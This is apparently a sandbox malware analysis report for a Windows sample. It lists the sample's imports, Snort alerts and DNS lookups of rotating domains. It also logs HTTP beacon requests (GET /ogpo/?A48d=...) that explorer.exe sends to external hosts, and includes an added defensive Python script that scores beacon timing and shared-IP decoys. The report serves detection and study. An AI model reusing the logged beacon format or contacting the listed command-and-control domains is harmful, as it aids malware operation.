RT_GROUP_ICON | 0x10cfe8 | 0x3e | data | English | United States
RT_MANIFEST | 0x10d028 | 0x2f0 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

Imports

DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll | OleUninitialize
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
comdlg32.dll | GetOpenFileNameA

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-12:23:24.887947 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49735 | 34.102.136.180 | 192.168.2.3
06/11/21-12:23:40.797790 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49742 | 34.102.136.180 | 192.168.2.3
06/11/21-12:24:22.687731 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49752 | 34.102.136.180 | 192.168.2.3
06/11/21-12:24:27.958566 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49753 | 34.102.136.180 | 192.168.2.3

Network Port Distribution

TCP Packets


UDP Packets

                                                                      Jun 11, 2021 12:22:38.343375921 CEST53507138.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:55.923523903 CEST5613253192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:55.982564926 CEST53561328.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:07.008698940 CEST5898753192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:07.009211063 CEST5657953192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:07.069541931 CEST53565798.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:07.073645115 CEST53589878.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:21.647491932 CEST6063353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:21.698964119 CEST53606338.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:22.282592058 CEST6129253192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:22.341458082 CEST53612928.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:24.622327089 CEST6361953192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:24.699976921 CEST53636198.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:26.527354002 CEST6493853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:26.588340998 CEST53649388.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:29.902024984 CEST6194653192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:30.068849087 CEST53619468.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:35.369520903 CEST6491053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:35.489573956 CEST53649108.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:40.546096087 CEST5212353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:40.613775015 CEST53521238.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:45.810470104 CEST5613053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:45.887887001 CEST53561308.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:51.185659885 CEST5633853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:51.259432077 CEST53563388.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:57.537866116 CEST5942053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:57.601284981 CEST53594208.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:09.374407053 CEST5878453192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:09.433257103 CEST53587848.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:10.457597017 CEST6397853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:10.518956900 CEST53639788.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:13.031668901 CEST6293853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:13.105762005 CEST53629388.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:17.293097019 CEST5570853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:17.419354916 CEST53557088.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:22.433267117 CEST5680353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:22.503843069 CEST53568038.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:27.700052023 CEST5714553192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:27.773278952 CEST53571458.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:32.965785027 CEST5535953192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:33.158107042 CEST53553598.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:38.497318983 CEST5830653192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:38.577857971 CEST53583068.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:43.591459990 CEST6412453192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:43.664848089 CEST53641248.8.8.8192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 12:22:13.571747065 CEST | 192.168.2.3 | 8.8.8.8 | 0x2c43 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:24.622327089 CEST | 192.168.2.3 | 8.8.8.8 | 0xf7b7 | Standard query (0) | www.cartercavanaugh.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:29.902024984 CEST | 192.168.2.3 | 8.8.8.8 | 0xc368 | Standard query (0) | www.ayco.sucks | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:35.369520903 CEST | 192.168.2.3 | 8.8.8.8 | 0x3587 | Standard query (0) | www.glocp9.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:40.546096087 CEST | 192.168.2.3 | 8.8.8.8 | 0xd96c | Standard query (0) | www.vigipharx.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:45.810470104 CEST | 192.168.2.3 | 8.8.8.8 | 0x6438 | Standard query (0) | www.plastictohydrogen.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:51.185659885 CEST | 192.168.2.3 | 8.8.8.8 | 0xe976 | Standard query (0) | www.mortgagenewsdailt.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:13.031668901 CEST | 192.168.2.3 | 8.8.8.8 | 0x4cfa | Standard query (0) | www.mortgagenewsdailt.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:17.293097019 CEST | 192.168.2.3 | 8.8.8.8 | 0xb909 | Standard query (0) | www.catherinelazure.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:22.433267117 CEST | 192.168.2.3 | 8.8.8.8 | 0x77df | Standard query (0) | www.amplifierconsulting.net | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:27.700052023 CEST | 192.168.2.3 | 8.8.8.8 | 0x26bb | Standard query (0) | www.plaquitasparamascota.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:32.965785027 CEST | 192.168.2.3 | 8.8.8.8 | 0x390b | Standard query (0) | www.indyoutlaws.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:38.497318983 CEST | 192.168.2.3 | 8.8.8.8 | 0x510d | Standard query (0) | www.nosequemierda.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:43.591459990 CEST | 192.168.2.3 | 8.8.8.8 | 0xd676 | Standard query (0) | www.studiodates.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 12:22:13.633863926 CEST | 8.8.8.8 | 192.168.2.3 | 0x2c43 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:22:13.633863926 CEST | 8.8.8.8 | 192.168.2.3 | 0x2c43 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:22:13.633863926 CEST | 8.8.8.8 | 192.168.2.3 | 0x2c43 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:22:13.633863926 CEST | 8.8.8.8 | 192.168.2.3 | 0x2c43 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:22:13.633863926 CEST | 8.8.8.8 | 192.168.2.3 | 0x2c43 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:21.698964119 CEST | 8.8.8.8 | 192.168.2.3 | 0x9b90 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:23:24.699976921 CEST | 8.8.8.8 | 192.168.2.3 | 0xf7b7 | No error (0) | www.cartercavanaugh.com | cartercavanaugh.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:23:24.699976921 CEST | 8.8.8.8 | 192.168.2.3 | 0xf7b7 | No error (0) | cartercavanaugh.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:30.068849087 CEST | 8.8.8.8 | 192.168.2.3 | 0xc368 | No error (0) | www.ayco.sucks | | 54.147.194.143 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:35.489573956 CEST | 8.8.8.8 | 192.168.2.3 | 0x3587 | Server failure (2) | www.glocp9.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:40.613775015 CEST | 8.8.8.8 | 192.168.2.3 | 0xd96c | No error (0) | www.vigipharx.com | vigipharx.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:23:40.613775015 CEST | 8.8.8.8 | 192.168.2.3 | 0xd96c | No error (0) | vigipharx.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:45.887887001 CEST | 8.8.8.8 | 192.168.2.3 | 0x6438 | No error (0) | www.plastictohydrogen.com | plastictohydrogen.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:23:45.887887001 CEST | 8.8.8.8 | 192.168.2.3 | 0x6438 | No error (0) | plastictohydrogen.com | | 185.98.131.46 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:23:51.259432077 CEST | 8.8.8.8 | 192.168.2.3 | 0xe976 | No error (0) | www.mortgagenewsdailt.com | | 81.17.18.198 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:13.105762005 CEST | 8.8.8.8 | 192.168.2.3 | 0x4cfa | No error (0) | www.mortgagenewsdailt.com | | 81.17.18.198 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:17.419354916 CEST | 8.8.8.8 | 192.168.2.3 | 0xb909 | Server failure (2) | www.catherinelazure.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:22.503843069 CEST | 8.8.8.8 | 192.168.2.3 | 0x77df | No error (0) | www.amplifierconsulting.net | amplifierconsulting.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:24:22.503843069 CEST | 8.8.8.8 | 192.168.2.3 | 0x77df | No error (0) | amplifierconsulting.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:27.773278952 CEST | 8.8.8.8 | 192.168.2.3 | 0x26bb | No error (0) | www.plaquitasparamascota.com | plaquitasparamascota.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:24:27.773278952 CEST | 8.8.8.8 | 192.168.2.3 | 0x26bb | No error (0) | plaquitasparamascota.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:33.158107042 CEST | 8.8.8.8 | 192.168.2.3 | 0x390b | No error (0) | www.indyoutlaws.com | indyoutlaws.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:24:33.158107042 CEST | 8.8.8.8 | 192.168.2.3 | 0x390b | No error (0) | indyoutlaws.com | | 192.185.11.167 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:38.577857971 CEST | 8.8.8.8 | 192.168.2.3 | 0x510d | Name error (3) | www.nosequemierda.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 12:24:43.664848089 CEST | 8.8.8.8 | 192.168.2.3 | 0xd676 | No error (0) | www.studiodates.com | studiodates.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:24:43.664848089 CEST | 8.8.8.8 | 192.168.2.3 | 0xd676 | No error (0) | studiodates.com | | 107.180.44.132 | A (IP address) | IN (0x0001)
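
The two DNS tables above show the pattern a responder wants to measure rather than eyeball: after the cdn.discordapp.com fetch, a fresh www.* name is looked up roughly every five seconds, four of those names resolve to the same address (34.102.136.180), and three never resolve at all. The Python below is an added example written for this page, not Joe Sandbox output and not code from the sample. Its input is transcribed from the Queries and Answers tables (CNAME hops collapsed onto the final A record, the background prda.aadg.msidentity.com lookup left out because it has no row in the Queries table); the 0.5 s cadence tolerance, the exclusion of the discordapp lookup from the interval calculation, and the two-name threshold for a shared-IP cluster are choices made here.

```python
"""Triage of the DNS tables above: check-in cadence, shared-IP decoys, dead names."""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample input, transcribed from the DNS Queries / DNS Answers tables of
# this report: (timestamp of the query, queried name, DNS reply code, first A record
# or None). CNAME hops are collapsed onto the final A record.
DNS_LOG = [
    ("Jun 11, 2021 12:22:13.571747065 CEST", "cdn.discordapp.com",           0, "162.159.135.233"),
    ("Jun 11, 2021 12:23:24.622327089 CEST", "www.cartercavanaugh.com",      0, "34.102.136.180"),
    ("Jun 11, 2021 12:23:29.902024984 CEST", "www.ayco.sucks",               0, "54.147.194.143"),
    ("Jun 11, 2021 12:23:35.369520903 CEST", "www.glocp9.com",               2, None),
    ("Jun 11, 2021 12:23:40.546096087 CEST", "www.vigipharx.com",            0, "34.102.136.180"),
    ("Jun 11, 2021 12:23:45.810470104 CEST", "www.plastictohydrogen.com",    0, "185.98.131.46"),
    ("Jun 11, 2021 12:23:51.185659885 CEST", "www.mortgagenewsdailt.com",    0, "81.17.18.198"),
    ("Jun 11, 2021 12:24:13.031668901 CEST", "www.mortgagenewsdailt.com",    0, "81.17.18.198"),
    ("Jun 11, 2021 12:24:17.293097019 CEST", "www.catherinelazure.com",      2, None),
    ("Jun 11, 2021 12:24:22.433267117 CEST", "www.amplifierconsulting.net",  0, "34.102.136.180"),
    ("Jun 11, 2021 12:24:27.700052023 CEST", "www.plaquitasparamascota.com", 0, "34.102.136.180"),
    ("Jun 11, 2021 12:24:32.965785027 CEST", "www.indyoutlaws.com",          0, "192.185.11.167"),
    ("Jun 11, 2021 12:24:38.497318983 CEST", "www.nosequemierda.com",        3, None),
    ("Jun 11, 2021 12:24:43.591459990 CEST", "www.studiodates.com",          0, "107.180.44.132"),
]

RCODE = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN"}


def parse_ts(ts: str) -> datetime:
    """Parse the report's 'Mon DD, YYYY HH:MM:SS.nnnnnnnnn ZONE' stamp.

    strptime's %f accepts at most six fractional digits, so the nanosecond
    field is truncated to microseconds; the zone suffix is dropped.
    """
    head, tail = ts.rsplit(".", 1)
    frac = tail.split(" ", 1)[0]
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def query_intervals(log, ignore=("cdn.discordapp.com",)):
    """Seconds between consecutive lookups, rounded to 10 ms.

    Names in `ignore` are skipped: the discordapp fetch belongs to the
    loader stage, not to the decoy loop that follows it.
    """
    times = [parse_ts(ts) for ts, name, _, _ in log if name not in ignore]
    return [round((b - a).total_seconds(), 2) for a, b in zip(times, times[1:])]


def cadence(intervals, tolerance=0.5):
    """Median interval and the share of intervals within +/- tolerance of it.

    A short median with a high share is a beacon; the two outliers in this
    report are pauses in the run, not the sample changing rhythm.
    """
    med = median(intervals)
    regular = sum(1 for d in intervals if abs(d - med) <= tolerance)
    return med, round(regular / len(intervals), 3)


def shared_ip_clusters(log, min_names=2):
    """Distinct names that resolved to the same address.

    Unrelated-looking domains collapsing onto one IP within a minute is the
    usual look of a parked or sinkholed decoy list.
    """
    by_ip = defaultdict(set)
    for _, name, rcode, addr in log:
        if rcode == 0 and addr:
            by_ip[addr].add(name)
    return {ip: sorted(names) for ip, names in by_ip.items() if len(names) >= min_names}


def failed_lookups(log):
    """Names that never resolved, with the reply code spelled out."""
    return [(name, RCODE.get(rcode, str(rcode))) for _, name, rcode, _ in log if rcode != 0]


if __name__ == "__main__":
    med, share = cadence(query_intervals(DNS_LOG))
    print(f"median interval {med:.2f}s, {share:.0%} of intervals regular")
    for ip, names in shared_ip_clusters(DNS_LOG).items():
        print(ip, "<-", ", ".join(names))
    print("dead names:", failed_lookups(DNS_LOG))
```

On this input the median interval is 5.27 s with ten of twelve intervals inside the tolerance; the 21.85 s and 4.26 s outliers bracket the gap between 12:23:51 and 12:24:13. The cluster function returns only 34.102.136.180 with four names behind it, and the dead-name list carries the two SERVFAIL and one NXDOMAIN entries. In a real DNS log the same three measures run over a per-host window; names that fail are as useful as names that resolve, since a decoy list is usually shipped with stale entries.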

HTTP Request Dependency Graph

• www.cartercavanaugh.com
• www.ayco.sucks
• www.vigipharx.com
• www.plastictohydrogen.com
• www.amplifierconsulting.net
• www.plaquitasparamascota.com
HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49735 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:23:24.749768019 CEST | 840 | OUT | GET /ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 HTTP/1.1
Host: www.cartercavanaugh.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:23:24.887947083 CEST | 840 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 11 Jun 2021 10:23:24 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60ba412a-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49741 | 54.147.194.143 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:23:30.214973927 CEST | 4030 | OUT | GET /ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 HTTP/1.1
Host: www.ayco.sucks
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:23:30.354352951 CEST | 4768 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 11 Jun 2021 10:23:30 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: http://www.ayco.sucks/ogpo?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0
Content-Length: 401
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 79 63 6f 2e 73 75 63 6b 73 2f 6f 67 70 6f 3f 41 34 38 64 3d 7a 43 30 6b 77 50 35 62 4b 63 74 48 6c 66 4c 4f 42 32 2b 73 69 62 7a 63 47 4b 42 33 69 4d 48 65 71 45 65 2f 6a 49 75 47 77 70 58 77 68 58 45 30 52 7a 46 6f 2f 7a 6c 5a 4b 63 74 52 43 32 32 5a 53 65 68 6d 26 61 6d 70 3b 36 6c 52 3d 36 6c 56 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 63 6f 2e 73 75 63 6b 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
